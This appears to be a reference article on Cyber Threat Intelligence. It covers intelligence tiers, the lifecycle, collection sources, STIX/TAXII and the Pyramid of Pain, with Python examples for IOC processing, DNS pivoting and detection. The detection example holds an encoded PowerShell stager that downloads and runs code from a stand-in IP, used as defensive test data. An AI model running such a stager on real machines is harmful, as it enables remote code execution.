Cyber Threat Intelligence (CTI)
BLUF
Cyber Threat Intelligence (CTI) is the intelligence discipline dedicated to the systematic collection, analysis, and dissemination of information about adversary cyber capabilities, intentions, infrastructure, and Tactics, Techniques, and Procedures (TTPs). Its operational purpose is to reduce uncertainty for defenders — security operations centres (SOCs), incident responders, executive leadership, and national policymakers — and to enable proactive defensive posture rather than reactive incident handling. CTI is the cyber-domain application of the classical intelligence cycle: requirements drive collection, collection feeds analysis, analysis produces decision-supporting products, and feedback refines the next iteration.
Fact: CTI is not synonymous with raw threat data. A list of malicious IP addresses, a feed of malware hashes, or a dump of compromised credentials are indicators — observable artefacts — not intelligence. Intelligence is what emerges when indicators are contextualised against adversary behaviour, evaluated for source reliability, correlated across campaigns, and packaged for a specific consumer decision. Similarly, CTI is distinct from vulnerability management: vulnerability management addresses weaknesses in the defender’s own attack surface; CTI addresses the threat actors who may exploit those weaknesses, their capabilities, and their probable courses of action.
Assessment: CTI is the intelligence discipline where traditional intelligence methodology — collection tasking, structured source evaluation, analytic tradecraft (ICD 203 standards, structured analytic techniques), formal dissemination — intersects most directly with technical cybersecurity tradecraft (reverse engineering, network forensics, malware analysis). Effective CTI programmes require fluency in both worlds; the discipline’s failure modes typically reflect dominance of one culture over the other (pure threat-feed vendors with no analytic rigor; or analyst shops with no technical collection capability).
The CTI Pyramid and Intelligence Levels
CTI is conventionally stratified into three tiers, each targeting a different consumer, time horizon, and decision class.
| Tier | Time Horizon | Consumers | Product Examples | Decision Supported |
|---|---|---|---|---|
| Strategic | 6–24 months | C-suite, board, CISO, national policymakers | Annual threat landscape reports, sector risk assessments, geopolitical-cyber nexus analysis | Investment prioritisation, regulatory positioning, M&A risk, sovereign technology decisions |
| Operational | Days to weeks | SOC leadership, incident commanders, threat hunters, red team leads | Campaign tracking reports, TTP cluster analyses, kill-chain mapping, hunt hypotheses | Detection engineering priorities, hunting campaigns, IR playbook activation |
| Tactical | Hours to days | SIEM engineers, firewall admins, EDR platforms | IOC feeds, YARA rules, Snort/Suricata signatures, STIX bundles | Automated blocking, alert tuning, signature deployment |
Strategic CTI answers questions of the form “Which state and non-state cyber adversaries are most likely to target our sector over the next budget cycle, and how should that shape our security investment?” It draws heavily on geopolitical analysis, adversary doctrine (the PLA Strategic Support Force, reorganised in 2024 into separate Information Support, Cyberspace and Aerospace Forces; GRU Unit 26165; IRGC cyber commands), and longitudinal trend data. Assessment: this tier is structurally under-served; most CTI vendors over-index on tactical output because it is easier to productise and easier to demonstrate as ROI in renewal cycles.
Operational CTI is the tier where campaign clustering occurs: linking observed intrusions to known threat groups (APT29, Lazarus, Volt Typhoon, Sandworm), mapping their kill-chain stages, and predicting next moves. It is the tier most directly informed by frameworks like MITRE ATT&CK and the Lockheed Martin Cyber Kill Chain.
Tactical CTI is the high-volume, short-half-life tier. Its products are machine-readable indicators consumed primarily by automated defensive systems, not by human analysts.
The CTI Lifecycle
CTI applies the classical Intelligence Cycle to the cyber domain, with discipline-specific refinements at each stage.
1. Direction
Defining Priority Intelligence Requirements (PIRs) specific to the consuming organisation. Example PIRs for a financial institution: “What ransomware actors are currently targeting Tier-1 banks?”, “Which credential-stealer families are most prevalent in our regulatory geography?”, “What initial-access broker offerings would expose our perimeter?” PIRs constrain collection — without them, CTI degenerates into untargeted threat-feed consumption.
2. Collection
Structured per the sources section below. Collection must be tasked against PIRs, with explicit source evaluation (reliability A–F, information credibility 1–6 — the NATO admiralty grading system).
3. Processing
Normalisation of heterogeneous data formats (STIX 2.1, OpenIOC, MISP event format, vendor-proprietary JSON), deduplication across overlapping feeds, enrichment (passive DNS lookups, WHOIS, geolocation, reputation scoring), and false-positive filtering. Assessment: a poorly tuned IOC feed can generate more analyst burden than it removes; once a feed's false-positive rate climbs to roughly 5% or above, SOC analysts stop trusting its alerts and the feed is effectively dead weight regardless of its true-positive content. Filtering at this stage should at minimum drop non-routable addresses, allowlisted corporate and vendor domains, and well-known benign hashes (the SHA-256 of an empty file is a perennial feed pollutant).
4. Analysis
TTP mapping against MITRE ATT&CK, campaign clustering using diamond-model pivots (adversary, capability, infrastructure, victim), actor Attribution with confidence assessment, and prioritisation by relevance to PIRs. Structured analytic techniques — Analysis of Competing Hypotheses (ACH), Key Assumptions Check, devil’s advocacy — are particularly important for attribution work, where confirmation bias and politically-motivated false-flag operations are documented risks.
5. Dissemination
Format and channel matched to the consumer tier. Strategic intelligence is disseminated as prose reports and executive briefings; operational intelligence as analyst memoranda and threat hunt packages; tactical intelligence as STIX objects served from TAXII collections that SIEM/EDR platforms poll (TAXII is client-pull by design, so "push" in practice means the consumer polling on a short interval).
6. Feedback
Structured consumption of analyst and SOC feedback — which feeds produced actionable alerts, which produced noise, which PIRs went unanswered — to refine the next cycle. Assessment: this stage is the most frequently neglected; CTI programmes that lack a formal feedback loop tend to ossify around legacy collection rather than evolving with the threat landscape.
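The processing stage (step 3) in code, as an added example that is not part of the original page: two constructed feeds in different formats (a CSV export and a MISP-style event) are normalised into one record shape, deduplicated across sources with confidence merged, and filtered for the false positives named above. The feed contents, the allowlist and the confidence values are all constructed; RFC 5737 documentation addresses are used as stand-ins for hostile IPs and are therefore deliberately not in the non-routable filter.

```python
"""Processing stage of the CTI lifecycle: normalise heterogeneous feeds into one
record shape, deduplicate across overlapping sources, and filter false positives.
Added example; all feed contents and the allowlist are constructed, not real."""
import csv
import io
import ipaddress
from dataclasses import dataclass

# Constructed CSV feed (RFC 5737 documentation addresses, .invalid names, placeholder hash).
CSV_FEED = """type,value,source,confidence
ip,203.0.113.10,feed-a,80
domain,update-check.invalid,feed-a,70
ip,10.0.0.5,feed-a,90
sha256,e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855,feed-a,60
domain,dl.windowsupdate.com,feed-a,50
"""

# Constructed MISP-style event; attribute type names follow MISP's (ip-dst, ip-src, domain).
MISP_EVENT = {
    "Event": {
        "info": "constructed example event",
        "Attribute": [
            {"type": "ip-dst", "value": "203.0.113.10", "to_ids": True},
            {"type": "domain", "value": "UPDATE-CHECK.invalid", "to_ids": True},
            {"type": "ip-src", "value": "198.51.100.7", "to_ids": True},
            {"type": "comment", "value": "analyst note, not an indicator", "to_ids": False},
        ],
    }
}

# Constructed allowlist of domains that legitimately appear in telemetry.
ALLOWLIST_DOMAINS = {"windowsupdate.com", "microsoft.com"}
EMPTY_FILE_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
# RFC 1918 / loopback / link-local. RFC 5737 documentation ranges are left out on
# purpose so the constructed sample addresses survive; a production filter would add them.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
                 "169.254.0.0/16", "0.0.0.0/8")]
MISP_TYPE_MAP = {"ip-dst": "ip", "ip-src": "ip", "domain": "domain",
                 "hostname": "domain", "sha256": "sha256", "md5": "md5"}


@dataclass
class IOC:
    kind: str
    value: str
    sources: set
    confidence: int


def canonical(kind, value):
    """Case and trailing-dot normalisation so the same artefact from two feeds collides."""
    value = value.strip()
    if kind == "domain":
        return value.lower().rstrip(".")
    if kind in ("sha256", "md5"):
        return value.lower()
    return value


def normalise_csv(text):
    return [IOC(r["type"], canonical(r["type"], r["value"]), {r["source"]}, int(r["confidence"]))
            for r in csv.DictReader(io.StringIO(text))]


def normalise_misp(event, source="misp", default_confidence=60):
    out = []
    for attr in event["Event"]["Attribute"]:
        kind = MISP_TYPE_MAP.get(attr["type"])
        if kind is None or not attr.get("to_ids", False):
            continue  # non-indicator attribute types, or flagged as not for detection
        out.append(IOC(kind, canonical(kind, attr["value"]), {source}, default_confidence))
    return out


def is_false_positive(ioc):
    if ioc.kind == "ip":
        try:
            addr = ipaddress.ip_address(ioc.value)
        except ValueError:
            return True  # malformed value: drop rather than ship a broken blocklist entry
        return any(addr in net for net in NON_ROUTABLE)
    if ioc.kind == "domain":
        labels = ioc.value.split(".")
        return any(".".join(labels[i:]) in ALLOWLIST_DOMAINS for i in range(len(labels)))
    if ioc.kind == "sha256":
        return ioc.value == EMPTY_FILE_SHA256
    return False


def dedupe(iocs):
    """Merge records for the same artefact: union of sources, highest confidence."""
    merged = {}
    for ioc in iocs:
        key = (ioc.kind, ioc.value)
        if key in merged:
            merged[key].sources |= ioc.sources
            merged[key].confidence = max(merged[key].confidence, ioc.confidence)
        else:
            merged[key] = IOC(ioc.kind, ioc.value, set(ioc.sources), ioc.confidence)
    return list(merged.values())


def process(csv_text, misp_event):
    raw = normalise_csv(csv_text) + normalise_misp(misp_event)
    kept = [i for i in dedupe(raw) if not is_false_positive(i)]
    # Corroboration by more than one source outranks a single source's own confidence.
    return sorted(kept, key=lambda i: (len(i.sources), i.confidence), reverse=True)


if __name__ == "__main__":
    for ioc in process(CSV_FEED, MISP_EVENT):
        print(ioc.kind, ioc.value, sorted(ioc.sources), ioc.confidence)
```

The ranking at the end is the part worth arguing about in a real programme: a single feed's self-reported confidence is rarely calibrated, whereas independent observation of the same artefact by two collection paths is evidence the consumer can reason about.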
CTI Sources — Collection Layer
OSINT
- Malware repositories: VirusTotal, MalShare, ANY.RUN, Hybrid Analysis, Malpedia. Provide samples, sandbox traces, and behavioural artefacts. VirusTotal in particular functions as a global passive observatory of malware in circulation.
- Threat actor tracking blogs: Mandiant/Google TAG, Microsoft MSTIC (Threat Intelligence Center), Secureworks Counter Threat Unit, SentinelOne SentinelLabs, Recorded Future Insikt Group, Citizen Lab, ESET WeLiveSecurity, Kaspersky GReAT, CrowdStrike Adversary Universe.
- Passive DNS platforms: VirusTotal, SecurityTrails (now Recorded Future), DomainTools, RiskIQ (now Microsoft Defender Threat Intelligence). Internet-scanning platforms such as Censys and Shodan are not passive DNS but complement it with host, service and certificate data. Together they enable infrastructure pivoting from a single indicator to an adversary’s operational network; the standing caveat is that shared hosting, CDNs and sinkholes will pull unrelated domains into the pivot unless the analyst stops expanding nodes with anomalous fan-out.
- Certificate transparency: crt.sh, Censys CT logs — surface adversary domain provisioning in near-real-time.
- Underground forum monitoring: see Dark Web Methodology.
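The infrastructure pivot described above (and the diamond-model infrastructure edge used in the analysis stage), as an added example that is not from the original page or any pDNS vendor: a breadth-first walk from one seed IP to the domains that resolved to it and on to the other IPs those domains used, refusing to expand any node whose fan-out marks it as shared infrastructure. The records are constructed (RFC 5737 addresses, `.invalid` names) with the same fields a passive DNS API returns; the fan-out threshold is an assumed tuning value.

```python
"""Infrastructure pivot over passive DNS records, the diamond-model move from
one adversary IP to the domains and further IPs that share it. Added example;
the records below are constructed (RFC 5737 documentation addresses, .invalid
names) and stand in for what a pDNS API would return."""
from collections import defaultdict, deque

# Constructed passive DNS records: (rrname, rrtype, rdata, first_seen, last_seen).
PDNS_RECORDS = [
    ("update-check.invalid", "A", "203.0.113.10", "2024-01-03", "2024-02-20"),
    ("cdn-assets.invalid",   "A", "203.0.113.10", "2024-01-10", "2024-02-18"),
    ("cdn-assets.invalid",   "A", "203.0.113.44", "2024-02-19", "2024-03-30"),
    ("mail-relay.invalid",   "A", "203.0.113.44", "2024-02-01", "2024-03-30"),
    ("cdn-assets.invalid",   "A", "198.51.100.9", "2024-03-01", "2024-03-30"),
    ("popular-site.invalid", "A", "198.51.100.9", "2023-06-01", "2024-03-30"),
]
# 198.51.100.9 stands in for a shared hosting / CDN address: dozens of unrelated
# tenants resolve to it, so pivoting through it would drag in innocent domains.
PDNS_RECORDS += [
    (f"tenant{i}.invalid", "A", "198.51.100.9", "2023-06-01", "2024-03-30") for i in range(40)
]


def build_graph(records):
    """Bipartite adjacency: domain -> {ip}, ip -> {domain}, plus first/last seen per edge."""
    adj = defaultdict(set)
    edges = {}
    for rrname, rrtype, rdata, first_seen, last_seen in records:
        if rrtype not in ("A", "AAAA"):
            continue  # CNAME/NS pivots need their own handling; not shown here
        d, ip = ("domain", rrname.lower()), ("ip", rdata)
        adj[d].add(ip)
        adj[ip].add(d)
        edges[(d, ip)] = (first_seen, last_seen)
    return adj, edges


def pivot(records, seed_ip, max_hops=3, max_fanout=20):
    """BFS from a seed IP. Nodes whose fan-out exceeds max_fanout (assumed tuning value)
    are recorded as shared infrastructure and not expanded. Returns the cluster, the
    skipped shared nodes, and the dated edges an analyst would cite as evidence."""
    adj, edges = build_graph(records)
    start = ("ip", seed_ip)
    seen = {start}
    shared = set()
    queue = deque([(start, 0)])
    while queue:
        node, hops = queue.popleft()
        if hops >= max_hops:
            continue
        if len(adj[node]) > max_fanout:
            shared.add(node)  # shared host / CDN / sinkhole: note it, don't walk through it
            continue
        for nxt in adj[node]:
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, hops + 1))
    cluster = seen - shared
    return {
        "domains": sorted(n[1] for n in cluster if n[0] == "domain"),
        "ips": sorted(n[1] for n in cluster if n[0] == "ip"),
        "shared_skipped": sorted(n[1] for n in shared),
        "edges": sorted(
            (d[1], ip[1], *edges[(d, ip)])
            for (d, ip) in edges if d in cluster and ip in cluster
        ),
    }


if __name__ == "__main__":
    for key, value in pivot(PDNS_RECORDS, "203.0.113.10").items():
        print(key, value)
```

The dated edges matter as much as the node list: a domain that moved to an IP only after the adversary's observed activity window may belong to whoever leased the address next, so the analyst should compare first/last seen against the campaign timeline before asserting the link.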
ISAC/ISAO Sharing
Sector-specific Information Sharing and Analysis Centers operate as trusted distribution hubs:
- FS-ISAC (financial services)
- E-ISAC (electricity/energy)
- H-ISAC (healthcare)
- MS-ISAC (US state/local/tribal/territorial government)
- Aviation-ISAC, Auto-ISAC, Space-ISAC
ISACs typically distribute STIX/TAXII feeds governed by Traffic Light Protocol (TLP 2.0) markings: TLP:RED (participants only, no onward disclosure), TLP:AMBER (the recipient's organisation and its clients; TLP:AMBER+STRICT confines it to the organisation itself), TLP:GREEN (the wider community, not public channels), TLP:CLEAR (no restriction). TLP states who may see the information, not how it is protected: a TLP:RED object still needs authenticated, encrypted transport and access control at rest, and a platform that ingests mixed-TLP feeds must carry the marking through to every derived alert and report.
Commercial CTI Feeds
Recorded Future, Mandiant Advantage, CrowdStrike Falcon Intelligence, Intel 471, Flashpoint, Group-IB, Team Cymru. Assessment: quality differentiation among vendors tracks (a) primary collection capability (proprietary sensor networks, dark-web HUMINT) vs. OSINT aggregation, (b) analyst depth and regional/linguistic coverage, and (c) latency from collection to product. Treat vendor self-attestation of “primary collection” with skepticism — independent validation is rarely available.
Internal Telemetry
EDR/XDR logs, SIEM event streams, DNS query logs, NetFlow/IPFIX, authentication logs. Fact: the organisation’s own intrusion history is, for that specific environment, the highest-fidelity threat-intelligence source available. A blocked phishing attempt against your CFO is more relevant intelligence for your defence than a generic IOC feed entry. CTI programmes that ignore internal telemetry in favour of external feeds invert the value pyramid.
Dark Web / Underground Markets
Ransomware leak sites (initial-access brokers, double-extortion victim listings), credential markets (Genesis Market — disrupted 2023; Russian Market; 2easy), exploit brokerages, malware-as-a-service forums. See Dark Web Methodology and DARKINT.
HUMINT / Liaison
Law-enforcement threat briefings (FBI Cyber Division, CISA, UK NCA, Europol EC3, BKA, AFP), trusted community relationships (CERT-to-CERT exchanges, FIRST membership), vetted researcher relationships. Gap: this collection channel is heavily dependent on personal trust and is structurally inaccessible to organisations without an established security maturity baseline.
STIX / TAXII — The Interoperability Standard
STIX 2.1 (Structured Threat Information Expression) is an OASIS-standard JSON-based language for representing cyber threat intelligence. TAXII 2.1 (Trusted Automated Exchange of Intelligence Information; the 1.x acronym expanded "Indicator Information") is the companion transport protocol: an HTTPS REST API through which clients discover a server's collections and poll or publish the STIX objects they hold.
STIX 2.1 Object Types (SDOs and SROs)
| Object | Purpose |
|---|---|
| indicator | Pattern matching observable artefacts (IPs, hashes, domains), with a validity window |
| malware | Malicious software families and variants |
| threat-actor | Individual or group conducting malicious activity |
| intrusion-set | Grouped TTPs/infrastructure attributed to one actor |
| campaign | Coordinated set of intrusions toward an objective |
| attack-pattern | TTP description (frequently a MITRE ATT&CK technique, linked via external_references) |
| course-of-action | Defensive or mitigation action |
| tool | Legitimate software used adversarially |
| vulnerability | CVE-class weakness |
| report | Analyst-curated narrative bundling other objects |
| note, opinion | Analytic commentary |
| relationship | Typed link (uses, indicates, attributed-to, ...) between two objects; an SRO |
| sighting | Observation of an indicator, malware or other SDO in the wild; an SRO |
The rows down to note and opinion are STIX Domain Objects (SDOs); relationship and sighting are STIX Relationship Objects (SROs), which connect SDOs rather than describe a thing in their own right. STIX 2.1 also defines the identity, infrastructure, location, observed-data, grouping and malware-analysis SDOs, omitted above, and marking-definition objects that carry TLP and other handling markings.
Why It Matters for OSINT
STIX encodes threat intelligence in a machine-readable format that enables automated ingestion, correlation, and sharing across organisational boundaries. Fact: MITRE ATT&CK itself is distributed as a STIX bundle. MISP (open-source CTI platform) natively imports/exports STIX. Most commercial CTI platforms support STIX/TAXII as their primary interoperability surface.
Limitations
Assessment: STIX-encoded tactical IOCs have a short operational half-life — IP addresses rotate in hours, domains in days, hashes change with each malware build. The durable analytic value embedded in STIX bundles is the TTP-level content (attack-pattern, intrusion-set SDOs) rather than the indicator-level content. Organisations that ingest STIX purely for indicator blocking extract a fraction of its potential value.
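A walk over a STIX 2.1 bundle that extracts the two kinds of content the assessment above distinguishes, as an added example (not the page's own code and not the OASIS `stix2` library): the durable TTP content is recovered by following `uses` relationships from intrusion-set to attack-pattern and reading the ATT&CK IDs from `external_references`, while the perishable indicator content is filtered by its `valid_from`/`valid_until` window. The bundle is constructed with placeholder UUIDs and a placeholder hash; the `_obj` helper exists only to build it.

```python
"""Walk a STIX 2.1 bundle: separate domain objects from relationship objects,
pull the durable TTP content (intrusion-set -> uses -> attack-pattern with
ATT&CK IDs) and keep only indicators still inside their validity window.
Added example; the bundle is constructed and the UUIDs are placeholders."""
import json
import re
from datetime import datetime, timezone

TS = "2024-01-15T10:00:00.000Z"


def _obj(kind, n, **props):
    """Constructed STIX 2.1 object with a placeholder UUID (not a real intelligence object)."""
    return {"type": kind, "spec_version": "2.1",
            "id": f"{kind}--00000000-0000-4000-8000-{n:012d}",
            "created": TS, "modified": TS, **props}


ACTOR = _obj("intrusion-set", 10, name="Constructed Bear")
AP_PHISH = _obj("attack-pattern", 20, name="Spearphishing Attachment",
                external_references=[{"source_name": "mitre-attack", "external_id": "T1566.001"}])
AP_PS = _obj("attack-pattern", 21, name="PowerShell",
             external_references=[{"source_name": "mitre-attack", "external_id": "T1059.001"}])
LOADER = _obj("malware", 30, name="ConstructedLoader", is_family=True)
IND_IP = _obj("indicator", 40, pattern_type="stix",
              pattern="[ipv4-addr:value = '203.0.113.10']",
              valid_from="2024-01-15T00:00:00.000Z", valid_until="2024-02-15T00:00:00.000Z")
IND_MULTI = _obj("indicator", 41, pattern_type="stix",
                 pattern="[domain-name:value = 'update-check.invalid'] OR "
                         "[file:hashes.'SHA-256' = '" + "0123456789abcdef" * 4 + "']",
                 valid_from="2024-01-15T00:00:00.000Z")
BUNDLE_JSON = json.dumps({
    "type": "bundle", "id": "bundle--00000000-0000-4000-8000-000000000001",
    "objects": [
        ACTOR, AP_PHISH, AP_PS, LOADER, IND_IP, IND_MULTI,
        _obj("relationship", 50, relationship_type="uses",
             source_ref=ACTOR["id"], target_ref=AP_PHISH["id"]),
        _obj("relationship", 51, relationship_type="uses",
             source_ref=ACTOR["id"], target_ref=AP_PS["id"]),
        _obj("relationship", 52, relationship_type="indicates",
             source_ref=IND_MULTI["id"], target_ref=LOADER["id"]),
        _obj("sighting", 60, sighting_of_ref=IND_MULTI["id"], count=3),
    ],
})

SRO_TYPES = {"relationship", "sighting"}
# One comparison inside a STIX pattern: object_path = 'value'
PATTERN_COMPARISON = re.compile(r"([a-z0-9-]+:[A-Za-z0-9_.'-]+)\s*=\s*'([^']*)'")


def load_bundle(text):
    return {obj["id"]: obj for obj in json.loads(text)["objects"]}


def split_sdo_sro(index):
    sdos = [o for o in index.values() if o["type"] not in SRO_TYPES]
    sros = [o for o in index.values() if o["type"] in SRO_TYPES]
    return sdos, sros


def attack_ids(obj):
    return [r["external_id"] for r in obj.get("external_references", [])
            if r.get("source_name") == "mitre-attack"]


def actor_ttps(index):
    """intrusion-set name -> sorted ATT&CK technique IDs, via 'uses' relationships."""
    ttps = {}
    for obj in index.values():
        if obj["type"] != "relationship" or obj["relationship_type"] != "uses":
            continue
        src, tgt = index.get(obj["source_ref"]), index.get(obj["target_ref"])
        if not src or not tgt or src["type"] != "intrusion-set" or tgt["type"] != "attack-pattern":
            continue  # dangling ref or a 'uses' edge of another shape (malware uses tool, ...)
        ttps.setdefault(src["name"], set()).update(attack_ids(tgt))
    return {name: sorted(ids) for name, ids in ttps.items()}


def parse_ts(value):
    """STIX timestamps are UTC, 'Z'-suffixed, with or without fractional seconds."""
    for fmt in ("%Y-%m-%dT%H:%M:%S.%fZ", "%Y-%m-%dT%H:%M:%SZ"):
        try:
            return datetime.strptime(value, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            pass
    raise ValueError(f"not a STIX timestamp: {value}")


def live_indicators(index, now):
    """Indicators whose validity window contains `now` and that are not revoked."""
    live = []
    for obj in index.values():
        if obj["type"] != "indicator" or obj.get("revoked"):
            continue
        if parse_ts(obj["valid_from"]) > now:
            continue
        if "valid_until" in obj and parse_ts(obj["valid_until"]) <= now:
            continue
        live.append(obj)
    return live


def pattern_observables(pattern):
    """(object_path, value) pairs from a STIX pattern; enough for blocklist export."""
    return PATTERN_COMPARISON.findall(pattern)
```

The regex is deliberately only a comparison extractor, not a STIX pattern parser: it ignores `AND`/`OR`, `WITHIN` and `REPEATS` qualifiers, so it is fit for exporting simple blocklists and nothing more. Note also that `live_indicators` treats a missing `valid_until` as open-ended, which is what the specification says and is exactly why feeds without expiry dates silently accumulate stale artefacts.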
IOC Lifecycle and the Pyramid of Pain
In 2013 David Bianco proposed the Pyramid of Pain, a model that ranks IOC types by the cost imposed on the adversary when defenders successfully detect and remediate that indicator class.
             /\
            /  \          TTPs (tough!)
           /----\
          /      \        Tools (challenging)
         /--------\
        /          \      Network / Host Artifacts (annoying)
       /------------\
      /              \    Domain Names (simple)
     /----------------\
    /                  \  IP Addresses (easy)
   /--------------------\
  /                      \ Hash Values (trivial)
 /------------------------\
- Bottom (trivial to easy for the adversary to change): hash values, IP addresses. The adversary regenerates these between operations, and sometimes within hours during a single operation.
- Middle (simple to annoying): domain names, host artefacts, network artefacts. More expensive to rotate but still routine adversary tradecraft.
- Top (challenging to tough): tools and TTPs. Forcing an adversary to replace a toolset, abandon a technique, retrain operators, or rebuild tooling imposes weeks to months of cost.
Assessment: IOC-sharing programmes anchored at the bottom two tiers are a treadmill — the defender invests effort that the adversary defeats by rotation. TTP-level intelligence that enables behaviour-based detection (e.g., process-tree heuristics, sequence-of-events SIEM rules) is the sustainable defensive investment. Gap: most commercial CTI products over-produce tactical IOCs and under-produce TTP-level analysis; this quality asymmetry has persisted across the industry for over a decade despite repeated practitioner critique.
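The treadmill in code, as an added example that is not from the original page or from Bianco's post: a hash rule and a parent/child behaviour rule run over constructed EDR process-creation events. The same phishing-macro TTP appears twice with different payload builds; the hash rule, fed by yesterday's IOC, catches only the first build, while the behaviour rule (an Office application spawning an executable from a user-writable path, or a script host with an encoded command) catches both, plus the encoded-PowerShell variant, and is excused from the benign Office helpers that would otherwise make it noisy. Hosts, paths, hashes and the encoded stager are all constructed; the technique IDs are ATT&CK's.

```python
"""Hash-based versus behaviour-based detection over constructed EDR process-creation
events. Added example; hosts, paths, hashes and the encoded command are constructed."""
import base64
import ntpath

# Constructed encoded PowerShell stager, built at runtime so the base64 is exact.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Office legitimately spawns these (print spooler proxy, error reporting); without this
# exclusion the rule pages the SOC every time someone prints a document.
BENIGN_OFFICE_CHILDREN = {"splwow64.exe", "dw20.exe", "werfault.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")

OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def _ev(host, parent_image, image, cmdline, sha256):
    return {"host": host, "parent_image": parent_image, "image": image,
            "cmdline": cmdline, "sha256": sha256}


# Constructed events; index 1 and 3 are the same TTP with different payload builds.
EVENTS = [
    _ev("ws01", r"C:\Windows\explorer.exe", OFFICE_DIR + r"\WINWORD.EXE",
        "WINWORD.EXE /n invoice.docm", "1" * 64),
    _ev("ws01", OFFICE_DIR + r"\WINWORD.EXE", r"C:\Users\alice\AppData\Local\Temp\invoice.exe",
        "invoice.exe", "a" * 64),
    _ev("ws01", OFFICE_DIR + r"\WINWORD.EXE", r"C:\Windows\splwow64.exe",
        "splwow64.exe 12288", "2" * 64),
    _ev("ws02", OFFICE_DIR + r"\EXCEL.EXE", r"C:\Users\bob\AppData\Local\Temp\report.exe",
        "report.exe", "b" * 64),
    _ev("ws03", OFFICE_DIR + r"\OUTLOOK.EXE", PS,
        f"powershell.exe -nop -w hidden -enc {ENCODED}", "3" * 64),
    _ev("ws04", r"C:\Windows\explorer.exe", PS,
        r"powershell.exe -File C:\Scripts\backup.ps1", "3" * 64),
]

BAD_HASHES = {"a" * 64}  # what yesterday's feed knew: the first build only


def basename(path):
    return ntpath.basename(path).lower()


def hash_rule(events, bad_hashes):
    """Bottom of the pyramid: exact match on the image hash."""
    return [i for i, e in enumerate(events) if e["sha256"] in bad_hashes]


def decode_encoded_command(cmdline):
    """Decode PowerShell's -EncodedCommand argument (base64 of UTF-16LE) or return None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-enc", "-encodedcommand", "-e", "-ec"):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def behaviour_rule(events):
    """Top of the pyramid: Office parent spawning a payload or a script host.
    Returns (event index, ATT&CK technique, reason, decoded command or None)."""
    hits = []
    for i, e in enumerate(events):
        parent, child = basename(e["parent_image"]), basename(e["image"])
        if parent not in OFFICE or child in BENIGN_OFFICE_CHILDREN:
            continue
        if child in SCRIPT_HOSTS:
            hits.append((i, "T1059", "office app spawned script host",
                         decode_encoded_command(e["cmdline"])))
        elif any(marker in e["image"].lower() for marker in USER_WRITABLE):
            hits.append((i, "T1204.002",
                         "office app spawned executable from user-writable path", None))
    return hits


if __name__ == "__main__":
    print("hash rule hits:", hash_rule(EVENTS, BAD_HASHES))
    for hit in behaviour_rule(EVENTS):
        print("behaviour hit:", hit)
```

The decoded command is returned rather than just flagged because the SOC needs the plaintext to triage; an alert that says only "encoded PowerShell seen" is itself a tactical-tier artefact that has to be re-investigated from scratch every time.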
CTI and OSINT Integration
CTI is the intelligence discipline most explicitly dependent on open-source collection. Three structural reasons:
- Adversary infrastructure is publicly observable. Passive DNS, certificate transparency logs, Shodan/Censys scans of internet-facing hosts, and BGP route observatories expose adversary operational infrastructure to anyone with the tools to query them.
- Malware is publicly co-collected. Victims and security researchers routinely submit samples to VirusTotal, ANY.RUN, and similar platforms. This produces a global, near-real-time corpus of adversary tooling; a platform account is the only barrier to it, and adversaries use the same corpus to test detection of their own builds.
- Threat actor TTPs are documented in public research. The threat-research industry has strong incentives (marketing, recruitment, customer education) to publish detailed analyses, which collectively constitute a public knowledge base of adversary tradecraft.
Assessment: a significant portion of enterprise-grade CTI production is traceable to OSINT collection. The added value of commercial CTI providers is typically in (a) collection breadth (more sensors, more languages, more forums), (b) correlation at scale (graph databases linking indicators across years of observations), and (c) analyst time-savings — not in unique classified collection unavailable to a well-resourced internal team. This has implications for build-vs-buy decisions in CTI programme design.
CTI in Support of National Security
CTI feeds upward from commercial and sector-level production into national intelligence products via several mechanisms:
- CISA Known Exploited Vulnerabilities (KEV) Catalog: a US-government-curated list of CVEs with confirmed active exploitation. Effectively a high-confidence tactical CTI product distributed to federal agencies (mandatory remediation under BOD 22-01) and the broader community.
- Joint advisories: NSA/CISA/FBI publications, frequently co-signed by Five Eyes partners (NCSC-UK, CCCS Canada, ACSC Australia, NCSC-NZ), naming specific adversary units (e.g., GRU Unit 26165 / Fancy Bear, MSS-affiliated groups) with TTPs and IOCs.
- Coordinated attribution advisories: Five Eyes joint statements naming state actors, increasingly accompanied by DOJ indictments of named officers — the most rigorous publicly verifiable attribution mechanism.
- Declassified intelligence weaponisation: in the months before the February 2022 Russian invasion of Ukraine, the US and UK governments executed an unprecedented declassification campaign, pre-emptively attributing planned Russian operations, exposing false-flag preparations, and disrupting Russia's information advantage. Assessment: this established a new operational model for using CTI as a strategic-communications instrument.
Gap — Attribution Standards
Gap: The CTI community lacks a systematic, publicly verifiable, peer-reviewed attribution standard. Commercial attributions (e.g., “we assess with high confidence this campaign is APT-XYZ”) carry implicit methodological claims about source quality, analytic rigor, and confidence calibration that are rarely externally validated. Different vendors regularly publish overlapping cluster taxonomies with inconsistent boundaries (APT28 vs. Sofacy vs. Fancy Bear vs. STRONTIUM vs. Forest Blizzard — all referencing substantially the same adversary, but with shifting scopes and confidence bases).
The US Government indictment model — DOJ charging named foreign officers with documented TTPs, infrastructure, and operational detail — remains the most rigorous public attribution mechanism, because it is testable against an evidentiary standard. However, indictments are driven by prosecutorial, political, and legal considerations rather than purely analytical ones, which constrains their use as a general attribution-standards reference.
Strategic Implications
